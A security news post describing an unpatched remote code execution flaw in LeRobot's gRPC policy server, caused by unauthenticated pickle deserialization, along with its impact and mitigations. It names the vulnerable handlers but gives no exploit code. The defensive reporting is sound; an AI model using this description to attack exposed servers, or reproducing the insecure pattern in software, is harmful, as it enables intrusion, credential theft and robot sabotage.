Posted in

AI Under Control: Unauthenticated RCE Flaw Hits Hugging Face LeRobot

In the race to standardize AI for robotics, LeRobot has become a cornerstone for developers, amassing nearly 24,000 GitHub stars. However, a critical security disclosure has revealed that the very framework designed to control real-world robots could be turned against its users.

Tracked as CVE-2026-25874 with a staggering CVSS score of 9.3, this unpatched vulnerability allows unauthenticated attackers to execute arbitrary commands on host machines. For an AI infrastructure often granted elevated privileges to manage GPUs and high-value datasets, the implications are devastating—ranging from data exfiltration to the physical sabotage of connected robots. +1


The Vulnerability: Deserialization in the Dark

The flaw, discovered and documented by security researcher Chocapikk (Valentin Lobstein), resides in LeRobot’s async inference pipeline. This component offloads heavy AI computations to a remote “Policy Server.” +1

The Technical Breakdown

The PolicyServer and RobotClient communicate over gRPC channels. The vulnerability is fueled by two major security oversights:

  1. Insecure Ports: The server uses add_insecure_port(), meaning it lacks both encryption (TLS) and any form of authentication.
  2. Pickle Deserialization: The framework uses Python’s native pickle module to process incoming data.

Because pickle is an executable format rather than a passive data format like JSON, it can reconstruct entire Python objects. An attacker simply needs to send a specially crafted “pickle” payload through gRPC handlers like SendPolicyInstructions or SendObservations. The moment the server calls pickle.loads(), the malicious code executes immediately—long before the server even checks if the data is valid.


The Irony of the “# nosec” Tag

Perhaps the most alarming detail of this breach is the evidence of developer awareness. Researchers found the source code contained # nosec tags positioned directly next to the dangerous pickle.loads() calls.

Note: In Python development, # nosec is a comment used to silence automated security linters (like Bandit) that flag insecure code.

Hugging Face famously pioneered the safetensors format to eliminate the exact “pickle-related” risks currently plaguing LeRobot. The decision to use the unsafe format—and then manually suppress the warnings—highlights a dangerous trade-off between development speed and system security. +1


The Blast Radius: From Server to Shop Floor

Because AI inference servers typically run with root or administrative privileges to access hardware resources, a successful exploit grants an attacker:

  • Administrative Control: Full access to the GPU server hosting the AI models.
  • Credential Theft: Exfiltration of Hugging Face API keys, SSH credentials, and proprietary model weights.
  • Physical Sabotage: Malicious commands sent to connected hardware, potentially causing dangerous or unintended robot movements in real-world environments.
  • Lateral Movement: Using the server as a “jump box” to attack other parts of the internal corporate network.

Affected Versions & Mitigation

The vulnerability currently affects all versions of LeRobot up to and including v0.5.1.

FrameworkAffected VersionsStatus
Hugging Face LeRobot0.4.3 – 0.5.1Unpatched (Critical)

Export to Sheets

Immediate Defensive Measures

While a permanent fix (switching to safetensors and JSON) is planned for v0.6.0, organizations must act now:

  • Network Isolation: Ensure that the LeRobot async inference server is never exposed to the public internet.
  • Bind to Localhost: Configure the server to bind to 127.0.0.1 rather than 0.0.0.0 to prevent external network connections.
  • Enforce a VPN/Firewall: If remote access is required, place the gRPC port behind a strict VPN or mTLS-authenticated gateway.
  • Run with Least Privilege: Transition the service to run as a non-privileged user within a restricted container (e.g., Docker with AppArmor) to limit the damage of a potential breakout.

Conclusion: No Convenience is Worth a Critical RCE

CVE-2026-25874 is a stark reminder that the AI “gold rush” cannot ignore basic security hygiene. As robotics moves from the lab to production, the frameworks we use must be as safe as the hardware they control. Until version 0.6.0 arrives, security teams must treat every unauthenticated gRPC port in their AI stack as a high-risk liability.

Leave a Reply

Your email address will not be published. Required fields are marked *